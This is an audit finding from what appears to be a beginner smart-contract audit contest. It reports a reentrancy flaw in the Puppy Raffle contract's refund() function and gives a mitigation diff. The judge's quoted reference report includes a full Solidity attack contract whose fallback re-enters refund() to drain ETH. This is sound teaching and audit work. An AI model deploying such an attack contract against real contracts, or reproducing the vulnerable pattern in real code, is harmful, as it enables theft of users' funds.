Puppy Raffle

AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
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Submission Details
Severity: high
Valid

External Call Before State Update in `refund()` Enables Reentrancy Attack

Description

The refund() function should safely return the entrance fee to a player and mark them as refunded. The Checks-Effects-Interactions pattern requires state updates before external calls.

The function sends ETH to the caller before updating the players array, allowing a malicious contract to recursively call refund() through its fallback function and drain the contract.

function refund(uint256 playerIndex) public {
address playerAddress = players[playerIndex];
require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");
@> payable(msg.sender).sendValue(entranceFee); // External call FIRST
@> players[playerIndex] = address(0); // State update AFTER (vulnerable)
emit RaffleRefunded(playerAddress);
}

Risk

Likelihood: High

  • Any participant can deploy a malicious contract to exploit this vulnerability

  • The attack requires only a single transaction to execute

Impact: High

  • Complete drainage of all ETH held by the contract

  • Loss of funds for all participants and the protocol

Proof of Concept

  1. Attacker deploys a malicious contract with a fallback() function that calls refund() again

  2. Attacker enters the raffle through the malicious contract

  3. Attacker calls refund() from the malicious contract

  4. The contract receives ETH and triggers the fallback() function

  5. The fallback() function calls refund() again before state is updated

  6. Steps 4-5 repeat until all funds are drained

  7. Only after all recursive calls complete does the state finally update

Recommended Mitigation

function refund(uint256 playerIndex) public {
address playerAddress = players[playerIndex];
require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");
+ // Update state BEFORE external call
+ players[playerIndex] = address(0);
+ emit RaffleRefunded(playerAddress);
- payable(msg.sender).sendValue(entranceFee);
+ (bool success, ) = payable(msg.sender).call{value: entranceFee}("");
+ require(success, "PuppyRaffle: Failed to refund");
- players[playerIndex] = address(0);
- emit RaffleRefunded(playerAddress);
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 1 hour ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-02] Reentrancy Vulnerability In refund() function

## Description The `PuppyRaffle::refund()` function doesn't have any mechanism to prevent a reentrancy attack and doesn't follow the Check-effects-interactions pattern ## Vulnerability Details ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` In the provided PuppyRaffle contract is potentially vulnerable to reentrancy attacks. This is because it first sends Ether to msg.sender and then updates the state of the contract.a malicious contract could re-enter the refund function before the state is updated. ## Impact If exploited, this vulnerability could allow a malicious contract to drain Ether from the PuppyRaffle contract, leading to loss of funds for the contract and its users. ```javascript PuppyRaffle.players (src/PuppyRaffle.sol#23) can be used in cross function reentrancies: - PuppyRaffle.enterRaffle(address[]) (src/PuppyRaffle.sol#79-92) - PuppyRaffle.getActivePlayerIndex(address) (src/PuppyRaffle.sol#110-117) - PuppyRaffle.players (src/PuppyRaffle.sol#23) - PuppyRaffle.refund(uint256) (src/PuppyRaffle.sol#96-105) - PuppyRaffle.selectWinner() (src/PuppyRaffle.sol#125-154) ``` ## POC <details> ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.7.6; import "./PuppyRaffle.sol"; contract AttackContract { PuppyRaffle public puppyRaffle; uint256 public receivedEther; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; } function attack() public payable { require(msg.value > 0); // Create a dynamic array and push the sender's address address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: msg.value}(players); } fallback() external payable { if (address(puppyRaffle).balance >= msg.value) { receivedEther += msg.value; // Find the index of the sender's address uint256 playerIndex = puppyRaffle.getActivePlayerIndex(address(this)); if (playerIndex > 0) { // Refund the sender if they are in the raffle puppyRaffle.refund(playerIndex); } } } } ``` we create a malicious contract (AttackContract) that enters the raffle and then uses its fallback function to repeatedly call refund before the PuppyRaffle contract has a chance to update its state. </details> ## Recommendations To mitigate the reentrancy vulnerability, you should follow the Checks-Effects-Interactions pattern. This pattern suggests that you should make any state changes before calling external contracts or sending Ether. Here's how you can modify the refund function: ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // Update the state before sending Ether players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); // Now it's safe to send Ether (bool success, ) = payable(msg.sender).call{value: entranceFee}(""); require(success, "PuppyRaffle: Failed to refund"); } ``` This way, even if the msg.sender is a malicious contract that tries to re-enter the refund function, it will fail the require check because the player's address has already been set to address(0).Also we changed the event is emitted before the external call, and the external call is the last step in the function. This mitigates the risk of a reentrancy attack.

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